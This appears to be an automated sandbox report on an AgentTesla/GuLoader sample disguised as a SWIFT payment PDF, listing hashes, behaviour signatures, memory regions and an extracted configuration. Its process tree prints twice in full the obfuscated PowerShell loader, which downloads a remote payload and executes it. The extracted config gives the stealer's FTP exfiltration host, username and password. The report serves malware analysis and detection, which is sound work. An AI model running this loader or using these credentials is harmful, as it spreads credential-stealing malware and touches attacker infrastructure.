Analysis

  • max time kernel
    145s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231127-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-12-2023 15:32

General

  • Target

    SwiftMessage pdf.vbe

  • Size

    82KB

  • MD5

    fcbd6270d7c941716d0afbfe8cbb2c73

  • SHA1

    3f7052edec4891d11a51b719280a84c5d548d87b

  • SHA256

    4f23df8fc1b89068d863512b5eded9ef654fde2d13e540ae2044583fa428e228

  • SHA512

    6d86c346058c25fc0078a69dbd924db3094198c00a275bd66064004b153f3bfa38a65cef45df34c5346d7e5848f24de633f3ee866d4e496ef4d527da16bb5640

  • SSDEEP

    1536:vKL/5HxzvNKG7EpBigtyVtjev/h0NL9C03mbXtlKycwpI/5LLogLM8KGeDyUgv7Q:Sr5HxDNKG7E6gEVtj2/h0NL9C03W9lKI

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://ftp.cefin.bg
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    #UuXy?6cIbL+

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SwiftMessage pdf.vbe"
    1⤵
      PID:5080
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sangskrivere9 ($Notarial){$Radioacoustics = $Notarial.Length-1; For ($Ungenerical=6; $Ungenerical -lt $Radioacoustics){$Hyperimmunity=$Hyperimmunity+$Notarial.Substring( $Ungenerical, 1);$Ungenerical+=7;}$Hyperimmunity;}$Oldings=Sangskrivere9 'CountehDuctedt CitertVeerskpOperta:Nonswe/Passen/Twinedr Bewaia InstrcbemaerkNonretoAppelloSnderjn Patto. ProtonMastige holdetUncurd/GenhuswBukserpColoss-raketti StyrtnAffjedcKonferlOrlogsuUdmnstdEngbloeCoassisLightf/NedladfVeuvero HalsbnManductPonginsDriftl/tjenstRSofavlaKngtens PerfetDropskeSemmetrOverdebDeportiBesgsslFrdigulTwangleComplod EmbuseGnostisRushwo1Demons5Sciote9Graspe.ValvifhLeasedhFirmaskBirkes ';$Hyperimmunity01=Sangskrivere9 'aserbaiBabbageAnneloxForank ';$Bare = Sangskrivere9 'rancid\DilatisRichteyVirtuosImpasswSkifteo UdvejwOmkart6Photog4Blindi\DemobiWDoucheiSiamesnBarnegdSarieroExacinw OmanrsKumulaP rancioOregonwAboraleimmolar gunvaSSolsyshErotise ChouclAggloml Fires\ Lejevvdegras1Phosph.Nummer0Specia\GreasipRykspaoKomediwbusteheSteganrIdealesOvertrhAttempeGenneml HovedlBarndo.ImparleFremtixExpilaeUnatte ';& ($Hyperimmunity01) (Sangskrivere9 'Antast$TravelTScorserMudderaMellemn TapetsJaponipFrilufeSkydevcSuperviFullfaaMarttitTillgsi ErantoKneelin Bjerg2Antimi=Alkali$Casitae Ifaldn democv Sandw:UnexpewUdgangiStarlenPosnindDotanti madeirPrinte ') ;& ($Hyperimmunity01) (Sangskrivere9 ' sozly$BlomstB Neuroa gundyrFoerereLament=inddat$AirshiTSalaelrHeltidaBlegsonforspesMinninp Musike ToneucOsiandiFrihedaknaldgtPartneitaarnfoContron milte2Supram+Brevba$OpdigtBHomebuaUnormarSchedueKuwait ') ;. ($Hyperimmunity01) (Sangskrivere9 'Barryg$AxonemBKommuniUnderenFljtesgdebetsePlankoyBeguilsVulcan Tvang=Fjeder Toastm(Bortka(GendargStdpudw HawsemGynecoiJernst Militaw FrictihyperpnSindss3nougat2Forcib_Pebblep ConjurOttereoBiogracEkstraeunderdsCronypsSelens Astigm-MilieuFmagnet ufaglrPPrevalrtulwaro DaddycLeahskeGardinsEmotivsGangstIBiomacdIndbef=Bushie$runlet{RoseerPBkkeneI EmiclDTobaks}Garant)Wervel.toldstCHybrido MyopomNonvarmArvegoaFourchnSlngkadDrejebLMellemi Troldn MarbleTyknin)Klarin Ionise-DisembsApocenpContral KulkaiSyodictHypoth Stynin[radicac AllothSvmmeraBrandhr Jarar]Servan3Busher4Callah ');. ($Hyperimmunity01) (Sangskrivere9 'Nothar$ForegrSBasecva InfornBinodegAutoriu DomkaiColoranKonstreEpiscooRetablvElectraOrdlissMotorbcAfsprruGennemlGravitaKellogrDebona remica=Landbr Jordfs$ DishaBPareniiPreendnTalstrg HypereMaidenyUnderrsBjergk[ fortr$RegionBStavnsiConglon UlvergSortereBaronrysubpoesRnkern.Hotkeyc TindeoBlgelnuGuaiacnAflevet Sagsb- Animi2Magnif]Ironiz ');. ($Hyperimmunity01) (Sangskrivere9 'Brnaby$OverbeERhesusrDezaleyMarrietDaarekhBeflearDisavoo AdsprpmisthrsHvirvliOpsigeaJasige=Vddema( MoodlTAcetone NystasPrenott Repla-FirspaPArcoviaSkyttet cathehbroend Nonmed$GttesaB UnderaReklamrUndereeBaalta)Isobat Sacrif-FeltbeA Postpn PooftdReprse Penum(Lappen[TandbgI BisilnDeodortTennisPTektostOvermerFregne]Colorf:Cibori:CompagsGrundsiHavmilzindhaleMerylb Gruens-Motozie distiqRunddy Papuan8Bankfi)Period ') ;if ($Erythropsia) {& $Bare $Sanguineovascular;} else {;$Hyperimmunity00=Sangskrivere9 'butcheSBouilltHistoca FlyttrFuldbytGasrab-KoraniBbehveti RemontCyesiosVinhanTRingdurAdultoaEncephnMyelopsDefensfAfprvneHermafrJttest Jeremi-DyrlgeSKoglenoLaparouSvedigrhospitcfullteeUnchar Satiab$ HotelOreauthlUopnaadSnogeniHovedpnTapetbgUnsticsEstrad Lydig- PlanoD fodereSostinsMosquit PlaniiWorsten Bombaaudkigst WishbiAsyndeoMetrolnGenera Diktat$RamshaT ConterOverliaSemicenSansersMalknip enogheFjerbocJordbriAbasemaFlandetUdpresiEpichioCryptonSprgsm2 Floth ';& ($Hyperimmunity01) (Sangskrivere9 ' Musik$AnonymTStealirGammelaMalkernmanacusPerverpSouthueYouthecKompakiIndvelaunstaytDieseliAlluvio EquilnManicu2Fjerns=Drejek$computeNitrogn KlingvForlor:UncereaFrumarpAmouripBelliedCathetareservtParentaRdbysi ') ;& ($Hyperimmunity01) (Sangskrivere9 'SteamlI CeremmPuritapFunktoo ScowtrKusinetStanly-WristfMGodsbeo Unrefd VacciuSubretl CoppeePresse kruspBForbytiRecalltHaablsshensadTcytoger UnleaaStrgetnEncephsSjleanf foreseReformrTolera ') ;$Transpeciation2=$Transpeciation2+'\magnetic.Ind';while (-not $Scutiform) {& ($Hyperimmunity01) (Sangskrivere9 'Paahld$RotatiSBefaricVitropuReformtButyrmiPhlebof Gollao Holger StabsmKferte=Semiru(OktantTUdmatne Princs VingetLacera-MotoriPSubsidaEndarktberapnhChyloi Otter$ChristTProscarPenetraIndisknHirudis LogogpreagereKontrocInkompiGstepra SpifftTillaviPriesto Skelsnheartl2Preten)Bagpro ') ;& ($Hyperimmunity01) $Hyperimmunity00;& ($Hyperimmunity01) (Sangskrivere9 'DelimiSGenfdst MarasaUdgyderSkibshtGodste- MyndiSClassilerotomeSengevebrugsvpBefolk Amayf5 Wayho ');}& ($Hyperimmunity01) (Sangskrivere9 ' Regne$SubtraS GoodlaStealsn Ionisglivmors KipkakFestmarSkviseiOverskvScorede VrelsrGlossieTender Deklas=Kresyg SjakalGStigmae ExtratUrtesu-OverbeC Ulvino styrenDvekontRengrie DuplanexcommtVenali Novemb$FilmvrTRealkrr BombyaFlerpanTerminsrepacipDistereCalyptcLiquefi BiproaPerspetZecchiiblamago AmphinHoodlu2Denarh ');. ($Hyperimmunity01) (Sangskrivere9 ' Spiri$ AnraaERetfrdjRuptursHovedltGravenrToneleuHimledpCircumhComitioDnnenolSlikpom Opblds Preen Hushol=Chasse Skidtf[SpankiSUnconcyBootidsResidetPangare KomodmFormaa.NonaccCKuldegoTeknoln ArchtvNazipaeCycloprSpritstBesvri]Desulf: Emnet:EmmeniFCaffeirWelbyboSvendemLucbanBNdringaNoktawsMaksime theoc6spitto4ForsnaSTrumfetSkizofr Kindei valgdnMochaegUopret(Wagons$TlpereSUndergaProsomnLipogrgBatchks VictikBladddrSorbitiGadaeavUnproge MillerMishanenasosi)Forsam ');. ($Hyperimmunity01) (Sangskrivere9 'Estime$AndrogHOvarioyDegildpBlissee Foresr OutjuiBrnemim IntramdiscjouDaareknOvergaiAssortt Cupley Bilab2 Bidco Sibens=snedig Postpo[ObligaSsprgery NpantsOmregntFircifeBehandm Skibu.CineasTEnqueteGennemxSargustAdmiss.BetlerELogikkn Undskc BespyoVmmelsdkursori Udbrnn WhispgSpanie]klapto:Quotat: fidusAMarkedSUigennCKindbaISymbasI Bruge.DishcrG GrabbegeneratOdrbarS myntetSkrotbrbarneviSskendn Whispg Krypt( Faare$ RammeE UundgjGlobois PeacetStienbrTerminuGlumalpAlpakahAfflueoInstrul FondsmrejectsRallik)Slicke ');. ($Hyperimmunity01) (Sangskrivere9 'Summab$fremspNSlievoo SlutanRawbondUnsubmeBiuratc Consie SkylliLandgavStrmkiaMadstebLianeilTambure Burni7Lustun0Sylvii= Afdra$ UdskrH Engily IncrupSubtece BesigrScreeniHemenvmUberrimFdevaruenkeltn Slylyiharemst Seksty Andes2Vafled.SubelesOversou Obanub CandlsCorvintInalierKhalatiArbejdnTrabeagSordar(Dehydr2 Esmak9Styrtg8Nonput8initiv8Barber0Afvars,Psycho2 Heads7Virked1Respue9Udkrse1Unchri)mimeog ');. ($Hyperimmunity01) $Nondeceivable70;}"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1584
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Sangskrivere9 ($Notarial){$Radioacoustics = $Notarial.Length-1; For ($Ungenerical=6; $Ungenerical -lt $Radioacoustics){$Hyperimmunity=$Hyperimmunity+$Notarial.Substring( $Ungenerical, 1);$Ungenerical+=7;}$Hyperimmunity;}$Oldings=Sangskrivere9 'CountehDuctedt CitertVeerskpOperta:Nonswe/Passen/Twinedr Bewaia InstrcbemaerkNonretoAppelloSnderjn Patto. ProtonMastige holdetUncurd/GenhuswBukserpColoss-raketti StyrtnAffjedcKonferlOrlogsuUdmnstdEngbloeCoassisLightf/NedladfVeuvero HalsbnManductPonginsDriftl/tjenstRSofavlaKngtens PerfetDropskeSemmetrOverdebDeportiBesgsslFrdigulTwangleComplod EmbuseGnostisRushwo1Demons5Sciote9Graspe.ValvifhLeasedhFirmaskBirkes ';$Hyperimmunity01=Sangskrivere9 'aserbaiBabbageAnneloxForank ';$Bare = Sangskrivere9 'rancid\DilatisRichteyVirtuosImpasswSkifteo UdvejwOmkart6Photog4Blindi\DemobiWDoucheiSiamesnBarnegdSarieroExacinw OmanrsKumulaP rancioOregonwAboraleimmolar gunvaSSolsyshErotise ChouclAggloml Fires\ Lejevvdegras1Phosph.Nummer0Specia\GreasipRykspaoKomediwbusteheSteganrIdealesOvertrhAttempeGenneml HovedlBarndo.ImparleFremtixExpilaeUnatte ';& ($Hyperimmunity01) (Sangskrivere9 'Antast$TravelTScorserMudderaMellemn TapetsJaponipFrilufeSkydevcSuperviFullfaaMarttitTillgsi ErantoKneelin Bjerg2Antimi=Alkali$Casitae Ifaldn democv Sandw:UnexpewUdgangiStarlenPosnindDotanti madeirPrinte ') ;& ($Hyperimmunity01) (Sangskrivere9 ' sozly$BlomstB Neuroa gundyrFoerereLament=inddat$AirshiTSalaelrHeltidaBlegsonforspesMinninp Musike ToneucOsiandiFrihedaknaldgtPartneitaarnfoContron milte2Supram+Brevba$OpdigtBHomebuaUnormarSchedueKuwait ') ;. ($Hyperimmunity01) (Sangskrivere9 'Barryg$AxonemBKommuniUnderenFljtesgdebetsePlankoyBeguilsVulcan Tvang=Fjeder Toastm(Bortka(GendargStdpudw HawsemGynecoiJernst Militaw FrictihyperpnSindss3nougat2Forcib_Pebblep ConjurOttereoBiogracEkstraeunderdsCronypsSelens Astigm-MilieuFmagnet ufaglrPPrevalrtulwaro DaddycLeahskeGardinsEmotivsGangstIBiomacdIndbef=Bushie$runlet{RoseerPBkkeneI EmiclDTobaks}Garant)Wervel.toldstCHybrido MyopomNonvarmArvegoaFourchnSlngkadDrejebLMellemi Troldn MarbleTyknin)Klarin Ionise-DisembsApocenpContral KulkaiSyodictHypoth Stynin[radicac AllothSvmmeraBrandhr Jarar]Servan3Busher4Callah ');. ($Hyperimmunity01) (Sangskrivere9 'Nothar$ForegrSBasecva InfornBinodegAutoriu DomkaiColoranKonstreEpiscooRetablvElectraOrdlissMotorbcAfsprruGennemlGravitaKellogrDebona remica=Landbr Jordfs$ DishaBPareniiPreendnTalstrg HypereMaidenyUnderrsBjergk[ fortr$RegionBStavnsiConglon UlvergSortereBaronrysubpoesRnkern.Hotkeyc TindeoBlgelnuGuaiacnAflevet Sagsb- Animi2Magnif]Ironiz ');. ($Hyperimmunity01) (Sangskrivere9 'Brnaby$OverbeERhesusrDezaleyMarrietDaarekhBeflearDisavoo AdsprpmisthrsHvirvliOpsigeaJasige=Vddema( MoodlTAcetone NystasPrenott Repla-FirspaPArcoviaSkyttet cathehbroend Nonmed$GttesaB UnderaReklamrUndereeBaalta)Isobat Sacrif-FeltbeA Postpn PooftdReprse Penum(Lappen[TandbgI BisilnDeodortTennisPTektostOvermerFregne]Colorf:Cibori:CompagsGrundsiHavmilzindhaleMerylb Gruens-Motozie distiqRunddy Papuan8Bankfi)Period ') ;if ($Erythropsia) {& $Bare $Sanguineovascular;} else {;$Hyperimmunity00=Sangskrivere9 'butcheSBouilltHistoca FlyttrFuldbytGasrab-KoraniBbehveti RemontCyesiosVinhanTRingdurAdultoaEncephnMyelopsDefensfAfprvneHermafrJttest Jeremi-DyrlgeSKoglenoLaparouSvedigrhospitcfullteeUnchar Satiab$ HotelOreauthlUopnaadSnogeniHovedpnTapetbgUnsticsEstrad Lydig- PlanoD fodereSostinsMosquit PlaniiWorsten Bombaaudkigst WishbiAsyndeoMetrolnGenera Diktat$RamshaT ConterOverliaSemicenSansersMalknip enogheFjerbocJordbriAbasemaFlandetUdpresiEpichioCryptonSprgsm2 Floth ';& ($Hyperimmunity01) (Sangskrivere9 ' Musik$AnonymTStealirGammelaMalkernmanacusPerverpSouthueYouthecKompakiIndvelaunstaytDieseliAlluvio EquilnManicu2Fjerns=Drejek$computeNitrogn KlingvForlor:UncereaFrumarpAmouripBelliedCathetareservtParentaRdbysi ') ;& ($Hyperimmunity01) (Sangskrivere9 'SteamlI CeremmPuritapFunktoo ScowtrKusinetStanly-WristfMGodsbeo Unrefd VacciuSubretl CoppeePresse kruspBForbytiRecalltHaablsshensadTcytoger UnleaaStrgetnEncephsSjleanf foreseReformrTolera ') ;$Transpeciation2=$Transpeciation2+'\magnetic.Ind';while (-not $Scutiform) {& ($Hyperimmunity01) (Sangskrivere9 'Paahld$RotatiSBefaricVitropuReformtButyrmiPhlebof Gollao Holger StabsmKferte=Semiru(OktantTUdmatne Princs VingetLacera-MotoriPSubsidaEndarktberapnhChyloi Otter$ChristTProscarPenetraIndisknHirudis LogogpreagereKontrocInkompiGstepra SpifftTillaviPriesto Skelsnheartl2Preten)Bagpro ') ;& ($Hyperimmunity01) $Hyperimmunity00;& ($Hyperimmunity01) (Sangskrivere9 'DelimiSGenfdst MarasaUdgyderSkibshtGodste- MyndiSClassilerotomeSengevebrugsvpBefolk Amayf5 Wayho ');}& ($Hyperimmunity01) (Sangskrivere9 ' Regne$SubtraS GoodlaStealsn Ionisglivmors KipkakFestmarSkviseiOverskvScorede VrelsrGlossieTender Deklas=Kresyg SjakalGStigmae ExtratUrtesu-OverbeC Ulvino styrenDvekontRengrie DuplanexcommtVenali Novemb$FilmvrTRealkrr BombyaFlerpanTerminsrepacipDistereCalyptcLiquefi BiproaPerspetZecchiiblamago AmphinHoodlu2Denarh ');. ($Hyperimmunity01) (Sangskrivere9 ' Spiri$ AnraaERetfrdjRuptursHovedltGravenrToneleuHimledpCircumhComitioDnnenolSlikpom Opblds Preen Hushol=Chasse Skidtf[SpankiSUnconcyBootidsResidetPangare KomodmFormaa.NonaccCKuldegoTeknoln ArchtvNazipaeCycloprSpritstBesvri]Desulf: Emnet:EmmeniFCaffeirWelbyboSvendemLucbanBNdringaNoktawsMaksime theoc6spitto4ForsnaSTrumfetSkizofr Kindei valgdnMochaegUopret(Wagons$TlpereSUndergaProsomnLipogrgBatchks VictikBladddrSorbitiGadaeavUnproge MillerMishanenasosi)Forsam ');. ($Hyperimmunity01) (Sangskrivere9 'Estime$AndrogHOvarioyDegildpBlissee Foresr OutjuiBrnemim IntramdiscjouDaareknOvergaiAssortt Cupley Bilab2 Bidco Sibens=snedig Postpo[ObligaSsprgery NpantsOmregntFircifeBehandm Skibu.CineasTEnqueteGennemxSargustAdmiss.BetlerELogikkn Undskc BespyoVmmelsdkursori Udbrnn WhispgSpanie]klapto:Quotat: fidusAMarkedSUigennCKindbaISymbasI Bruge.DishcrG GrabbegeneratOdrbarS myntetSkrotbrbarneviSskendn Whispg Krypt( Faare$ RammeE UundgjGlobois PeacetStienbrTerminuGlumalpAlpakahAfflueoInstrul FondsmrejectsRallik)Slicke ');. ($Hyperimmunity01) (Sangskrivere9 'Summab$fremspNSlievoo SlutanRawbondUnsubmeBiuratc Consie SkylliLandgavStrmkiaMadstebLianeilTambure Burni7Lustun0Sylvii= Afdra$ UdskrH Engily IncrupSubtece BesigrScreeniHemenvmUberrimFdevaruenkeltn Slylyiharemst Seksty Andes2Vafled.SubelesOversou Obanub CandlsCorvintInalierKhalatiArbejdnTrabeagSordar(Dehydr2 Esmak9Styrtg8Nonput8initiv8Barber0Afvars,Psycho2 Heads7Virked1Respue9Udkrse1Unchri)mimeog ');. ($Hyperimmunity01) $Nondeceivable70;}"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4432
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
            4⤵
            • Adds Run key to start application
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1668
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 2392
              5⤵
              • Program crash
              PID:4272
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1668 -ip 1668
      1⤵
        PID:1628

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gyvzb2yt.pwe.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/1584-0-0x00000252C7570000-0x00000252C7592000-memory.dmp

        Filesize

        136KB

      • memory/1584-10-0x00007FF90E950000-0x00007FF90F411000-memory.dmp

        Filesize

        10.8MB

      • memory/1584-11-0x00000252C7560000-0x00000252C7570000-memory.dmp

        Filesize

        64KB

      • memory/1584-12-0x00000252C7560000-0x00000252C7570000-memory.dmp

        Filesize

        64KB

      • memory/1584-13-0x00000252C7560000-0x00000252C7570000-memory.dmp

        Filesize

        64KB

      • memory/1584-44-0x00000252C7560000-0x00000252C7570000-memory.dmp

        Filesize

        64KB

      • memory/1584-43-0x00000252C7560000-0x00000252C7570000-memory.dmp

        Filesize

        64KB

      • memory/1584-66-0x00007FF90E950000-0x00007FF90F411000-memory.dmp

        Filesize

        10.8MB

      • memory/1584-45-0x00000252C7560000-0x00000252C7570000-memory.dmp

        Filesize

        64KB

      • memory/1584-42-0x00007FF90E950000-0x00007FF90F411000-memory.dmp

        Filesize

        10.8MB

      • memory/1668-62-0x00000000747A0000-0x0000000074F50000-memory.dmp

        Filesize

        7.7MB

      • memory/1668-59-0x000000006EDE0000-0x000000006EE20000-memory.dmp

        Filesize

        256KB

      • memory/1668-58-0x00000000005C0000-0x0000000000FD4000-memory.dmp

        Filesize

        10.1MB

      • memory/1668-57-0x000000006EDE0000-0x0000000070034000-memory.dmp

        Filesize

        18.3MB

      • memory/1668-56-0x00000000771C1000-0x00000000772E1000-memory.dmp

        Filesize

        1.1MB

      • memory/1668-55-0x0000000077248000-0x0000000077249000-memory.dmp

        Filesize

        4KB

      • memory/1668-54-0x00000000005C0000-0x0000000000FD4000-memory.dmp

        Filesize

        10.1MB

      • memory/1668-63-0x000000001F050000-0x000000001F060000-memory.dmp

        Filesize

        64KB

      • memory/1668-67-0x00000000005C0000-0x0000000000FD4000-memory.dmp

        Filesize

        10.1MB

      • memory/1668-69-0x00000000747A0000-0x0000000074F50000-memory.dmp

        Filesize

        7.7MB

      • memory/4432-20-0x0000000005670000-0x00000000056D6000-memory.dmp

        Filesize

        408KB

      • memory/4432-52-0x0000000008890000-0x00000000092A4000-memory.dmp

        Filesize

        10.1MB

      • memory/4432-40-0x0000000007470000-0x0000000007492000-memory.dmp

        Filesize

        136KB

      • memory/4432-41-0x00000000074F0000-0x0000000007504000-memory.dmp

        Filesize

        80KB

      • memory/4432-37-0x00000000070D0000-0x0000000007166000-memory.dmp

        Filesize

        600KB

      • memory/4432-38-0x0000000006450000-0x0000000006472000-memory.dmp

        Filesize

        136KB

      • memory/4432-35-0x00000000076B0000-0x0000000007D2A000-memory.dmp

        Filesize

        6.5MB

      • memory/4432-36-0x00000000063B0000-0x00000000063CA000-memory.dmp

        Filesize

        104KB

      • memory/4432-46-0x00000000747A0000-0x0000000074F50000-memory.dmp

        Filesize

        7.7MB

      • memory/4432-47-0x0000000004A00000-0x0000000004A10000-memory.dmp

        Filesize

        64KB

      • memory/4432-49-0x0000000004A00000-0x0000000004A10000-memory.dmp

        Filesize

        64KB

      • memory/4432-50-0x0000000008890000-0x00000000092A4000-memory.dmp

        Filesize

        10.1MB

      • memory/4432-51-0x0000000007590000-0x0000000007591000-memory.dmp

        Filesize

        4KB

      • memory/4432-39-0x00000000082E0000-0x0000000008884000-memory.dmp

        Filesize

        5.6MB

      • memory/4432-53-0x00000000771C1000-0x00000000772E1000-memory.dmp

        Filesize

        1.1MB

      • memory/4432-34-0x0000000004A00000-0x0000000004A10000-memory.dmp

        Filesize

        64KB

      • memory/4432-33-0x0000000005E60000-0x0000000005EAC000-memory.dmp

        Filesize

        304KB

      • memory/4432-32-0x0000000005E20000-0x0000000005E3E000-memory.dmp

        Filesize

        120KB

      • memory/4432-31-0x0000000005800000-0x0000000005B54000-memory.dmp

        Filesize

        3.3MB

      • memory/4432-21-0x0000000005790000-0x00000000057F6000-memory.dmp

        Filesize

        408KB

      • memory/4432-60-0x00000000747A0000-0x0000000074F50000-memory.dmp

        Filesize

        7.7MB

      • memory/4432-19-0x0000000004F50000-0x0000000004F72000-memory.dmp

        Filesize

        136KB

      • memory/4432-61-0x0000000008890000-0x00000000092A4000-memory.dmp

        Filesize

        10.1MB

      • memory/4432-18-0x0000000005040000-0x0000000005668000-memory.dmp

        Filesize

        6.2MB

      • memory/4432-17-0x0000000004A00000-0x0000000004A10000-memory.dmp

        Filesize

        64KB

      • memory/4432-16-0x0000000004A00000-0x0000000004A10000-memory.dmp

        Filesize

        64KB

      • memory/4432-15-0x00000000024E0000-0x0000000002516000-memory.dmp

        Filesize

        216KB

      • memory/4432-14-0x00000000747A0000-0x0000000074F50000-memory.dmp

        Filesize

        7.7MB